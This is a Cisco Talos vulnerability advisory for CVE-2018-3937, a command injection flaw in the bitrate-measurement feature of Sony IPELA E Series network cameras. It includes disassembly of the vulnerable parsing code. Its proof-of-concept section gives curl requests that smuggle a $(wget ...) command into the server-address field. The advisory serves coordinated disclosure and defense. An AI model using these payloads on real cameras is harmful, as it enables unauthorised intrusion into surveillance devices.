Talos Vulnerability Report

TALOS-2018-0604

Sony IPELA E Series Camera measurementBitrateExec command injection vulnerability

July 20, 2018
CVE Number

CVE-2018-3937

Summary

An exploitable command injection vulnerability exists in the measurementBitrateExec functionality of Sony IPELA E Series Network Camera. A specially crafted GET request can cause arbitrary commands to be executed. An attacker can send an HTTP request to trigger this vulnerability.

Tested Versions

Sony IPELA E series G5 firmware 1.87.00

Product URLs

Firmware

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Details

Sony IPELA Cameras are network facing cameras used for monitoring and surveillance.

In order to measure network performance, the camera leverages iperf. While building the iperf command, a specific payload can be sent to the main.cgi in order to turn on performance measuring for UDP or TCP traffic:

measurement=bitrate,client,8.8.8.8,udp,123
measurement=bitrate,client,8.8.8.8,tcp,123

This string is parsed by main.cgi by finding the client substring and splitting at the comma:

0x0000aa48      0400a0e1       mov r0, r4                  ; Input String
0x0000aa4c      cc159fe5       ldr r1, [pc, 0x5cc]         ; [0xb020:4]=0xd298 str.client
0x0000aa50      0620a0e3       mov r2, 6
0x0000aa54      a9fdffeb       bl sym.imp.strncasecmp
0x0000aa58      000050e3       cmp r0, 0
0x0000aa5c      acffff1a       bne 0xa914
0x0000aa60      0400a0e1       mov r0, r4
0x0000aa64      0710a0e1       mov r1, r7
0x0000aa68      2c20a0e3       mov r2, 0x2c                ; ','
0x0000aa6c      c4fdffeb       bl sym.g5::libcgi::LibCGI::split_element

Subsequently, parsing the server address is done by using find to locate the next comma and extracting the string between the comma after client.

0x0000aa98      0400a0e1       mov r0, r4
0x0000aa9c      0c3086e2       add r3, r6, 0xc
0x0000aaa0      94308de5       str r3, [sp, 0x94]
0x0000aaa4      7c159fe5       ldr r1, [pc, 0x57c]         ; [0xb028:4]=0xd2a0 ","
0x0000aaa8      0020a0e3       mov r2, 0
0x0000aaac      0130a0e3       mov r3, 1
0x0000aab0      71fdffeb       bl sym.std::string::find    ; Find the comma after the server address
0x0000aab4      010070e3       cmn r0, 1
0x0000aab8      0040a0e1       mov r4, r0
0x0000aabc      3e00000a       beq 0xabbc
0x0000aac0      90508de2       add r5, sp, 0x90
0x0000aac4      0500a0e1       mov r0, r5
0x0000aac8      98109de5       ldr r1, [sp, 0x98]
0x0000aacc      a6208de2       add r2, sp, 0xa6
0x0000aad0      7efdffeb       bl sym.std::basic_string_char_std::char_traits_char__std::allocator_char__::basic_string
0x0000aad4      0510a0e1       mov r1, r5
0x0000aad8      0430a0e1       mov r3, r4
0x0000aadc      94008de2       add r0, sp, 0x94
0x0000aae0      0020a0e3       mov r2, 0
0x0000aae4      73fdffeb       bl sym.std::string::append

The above parsing results in the following commands:

UDP:
sh -c /usr/local/bin/iperf -c 8.8.8.8 -u -b 123K -x CD > /dev/null &

TCP:
/usr/local/bin/iperf -c 8.8.8.8 -F /tmp/MeasurementBitrateData -n 1 > /dev/null &

While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address.

Exploit Proof of Concept

UDP:
curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),udp,123" http://camera-address/command/main.cgi

TCP:
curl --data "measurement=bitrate,client,1.2.3.4\$(wget http://address),tcp,123" http://camera-address/command/main.cgi

Timeline

2018-06-04 - Vendor disclosure
2018-07-19 - Vendor patched
2018-07-20 - Public release

Credit

Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.